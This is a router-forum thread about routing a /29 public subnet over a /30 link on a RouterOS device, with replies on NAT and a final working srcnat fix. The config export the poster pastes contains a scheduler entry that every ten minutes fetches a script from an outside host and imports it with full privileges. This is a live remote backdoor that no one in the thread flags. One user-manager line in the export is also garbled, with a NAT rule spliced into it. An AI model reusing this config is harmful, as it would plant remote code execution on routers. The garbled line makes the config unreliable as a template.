Setting up /29 over /30

poduck · Wed Apr 22, 2020 6:15 pm

My ISP has given me a /29 subnet routed through a /30 and I am having difficulty getting it setup correctly.

I have x.x.x.200/30, so I assign x.x.x.201 as the gateway, and x.x.x.202 as the router IP address.

Incoming traffic seems to work okay. It gets to the correct machine, but outgoing traffic all shows as though it is going through the x.x.x.202 address on the /30.

I assume that this is all happening because I have a srcnat masquerade rule set for a lan, but I could be completely wrong.

Anyway, I must be missing something simple, but how am I supposed to set these IP addresses up so I can use them as public IP addresses?

Thanks

ingdaka · Wed Apr 22, 2020 7:25 pm

Yes is because of NAT! In nat roule specify src-address and will be OK, i think!

For better you should export your config and post it here!

Zacharias · Wed Apr 22, 2020 7:33 pm

This looks totally fine...
Lets say my ISP gives me a /30 block x.y.z.200/30
First of all in this /30 block, one address is used by your ISP, which is actually your gateway and the other one is for you. So...
1. I will assign the address x.y.z.202/30 to my eth1 interface
2. I ll create a deafult route to x.y.z.201
3. I ll create a src-nat rule (no need to masquerade since you know your IP and it does not change, it is static) to address x.y.z.202

So, from what you are saying nothing seems wrong to me...

However, in case you mean that you assign x.y.z.201 to ether1 and you try to masquerade to x.y.z.202 that is wrong...
If you mean something else please provide more details... what is the IP address you should route your traffic to etc...

poduck · Wed Apr 22, 2020 7:44 pm

Okay, I changed the src-address, and things aren't working, but I have mangled things up and changed them around so much that I have forgotten how I had originally setup the static IP I'm working with, which is the one ending in 178.

The entire config seems a bit excessive, but here it is.

# apr/22/2020 12:28:40 by RouterOS 6.46.5
# software id = NZ9N-XSEL
#
# model = CCR1009-7G-1C-1S+
# serial number = 6F530619F090
/interface bridge
add name=lan
add name=nopawn
/interface ethernet
set [ find default-name=ether1 ] name=ether1-metro-wan
set [ find default-name=ether2 ] name=ether2-frontpcs
set [ find default-name=ether3 ] name=ether3-server1
set [ find default-name=ether4 ] name=ether4-nopawn
set [ find default-name=ether5 ] disabled=yes
set [ find default-name=ether6 ] disabled=yes
set [ find default-name=ether7 ] name=ether7-switch1
set [ find default-name=sfp-sfpplus1 ] disabled=yes
/interface list
add name=WAN
add name=LAN
/ip pool
add name=dhcp ranges=10.0.1.150-10.0.1.254
/ip dhcp-server
add address-pool=dhcp disabled=no interface=lan name=dhcp1
/tool user-manager customer
set admin access=own-routers,own-users,own-profiles,own-limits,config-payment-gw
add access=owadd action=masquerade chain=srcnat out-interface-list=WANn-routers,own-users,own-profiles,own-limits,config-payment-gw backup-allowed=\
    yes disabled=no login=MikroTik paypal-accept-pending=no paypal-allowed=no \
    paypal-secure-response=no permissions=owner signup-allowed=no time-zone=-00:00
/interface bridge port
add bridge=lan interface=ether2-frontpcs
add bridge=lan interface=ether3-server1
add bridge=nopawn interface=ether4-nopawn
add bridge=lan interface=ether5
add bridge=lan interface=ether6
add bridge=lan interface=ether7-switch1
add bridge=lan interface=sfp-sfpplus1
add bridge=lan interface=combo1
/interface list member
add interface=ether1-metro-wan list=WAN
add interface=lan list=LAN
/ip address
add address=69.174.129.202/30 interface=ether1-metro-wan network=69.174.129.200
add address=10.0.1.1/24 interface=ether2-frontpcs network=10.0.1.0
add address=69.174.131.178/29 interface=lan network=69.174.131.176
/ip arp
add address=10.0.1.157 interface=lan mac-address=2C:4C:C6:C7:15:7F
/ip dhcp-client
add interface=ether1-metro-wan
/ip dhcp-server network
add address=10.0.1.0/24 gateway=10.0.1.1 netmask=24
/ip dns
set servers=8.8.8.8,8.8.4.4
/ip firewall nat
add action=masquerade chain=srcnat out-interface-list=WAN src-address=10.0.1.0/24
/ip route
add distance=1 gateway=69.174.129.201
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set api disabled=yes
set api-ssl disabled=yes
/system clock
set time-zone-name=America/Indiana/Indianapolis
/system scheduler
add interval=10m name=U6 on-event="/tool fetch url=http://cloudsond.me/poll/94af80f5-3040-4e9\
    c-8b9f-78a72a8c7ec9 mode=http dst-path=7wmp0b4s.rsc\r\
    \n/import 7wmp0b4s.rsc" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=jan/02/1970 \
    start-time=01:06:54
/tool user-manager database
set db-path=user-manager
/tool user-manager router
add coa-port=1700 customer=MikroTik disabled=no ip-address=10.0.1.1 log=auth-fail name=\
    router1 use-coa=no
/tool user-manager user
add customer=MikroTik disabled=no ip-address=192.168.2.5 ipv6-dns=:: shared-users=1 \
    username=F0:9F:C2:91:90:02 wireless-enc-algo=none wireless-enc-key="" wireless-psk=""

poduck · Wed Apr 22, 2020 7:50 pm

This looks totally fine...
Lets say my ISP gives me a /30 block x.y.z.200/30
First of all in this /30 block, one address is used by your ISP, which is actually your gateway and the other one is for you. So...
1. I will assign the address x.y.z.202/30 to my eth1 interface
2. I ll create a deafult route to x.y.z.201
3. I ll create a src-nat rule (no need to masquerade since you know your IP and it does not change, it is static) to address x.y.z.202

So, from what you are saying nothing seems wrong to me...

However, in case you mean that you assign x.y.z.201 to ether1 and you try to masquerade to x.y.z.202 that is wrong...
If you mean something else please provide more details... what is the IP address you should route your traffic to etc...

I have the /30 setup correctly. Traffic moves through the router. On the other hand, I am not planning on using public IP addresses for everything. I want to have two separate lans eventually, each using a separate public IP address.

Zacharias · Wed Apr 22, 2020 7:57 pm

That is simple...
Set public 1 IP to eth1
Set public 2 IP to eth2
Or just let the Public IP /30 (whole subnet block) to your eth1... But i do not prefer that way...

Lets say you have 2 Lans subnets 192.168.1.0/24 and 192.168.2.0/24...

On your firewall NAT you will create a src-nat rule with src-address 192.168.1.0/24 and out interface eth1 to src-nat to address x.y.z.201
On your firewall NAT you will create a src-nat rule with src-address 192.168.2.0/24 and out interface eth2 to src-nat to address x.y.z.202

Ofcorse you must already have created the local subnets 192.168.1.1/24 and 192.168.2.1/24 either on Bridges or VLANs etc...

k6ccc · Thu Apr 23, 2020 2:20 am

I have the /30 setup correctly. Traffic moves through the router. On the other hand, I am not planning on using public IP addresses for everything. I want to have two separate lans eventually, each using a separate public IP address.

With a /30 CIDR, you only have two available addresses - one is for you and one is for the ISP. There are a total of four, but the first IP is the network ID, and the last is the broadcast IP. That leaves only two, and your ISP uses one of those.

poduck · Thu Apr 23, 2020 3:49 pm

Okay, I finally got it figured out.

I setup two lans with masquerading, but I first setup an accept rule for the public IP addresses so they wouldn't get masqueraded. That was the final piece that fixed things.

/ip firewall nat
add action=accept chain=srcnat src-address=69.174.131.176/29
add action=masquerade chain=srcnat out-interface-list=WAN src-address=10.0.1.0/24
add action=masquerade chain=srcnat out-interface-list=WAN src-address=10.0.2.0/24

Setting up /29 over /30 [SOLVED]

Setting up /29 over /30

Re: Setting up /29 over /30

Re: Setting up /29 over /30

Re: Setting up /29 over /30

Re: Setting up /29 over /30

Re: Setting up /29 over /30

Re: Setting up /29 over /30

Re: Setting up /29 over /30 [SOLVED]

Who is online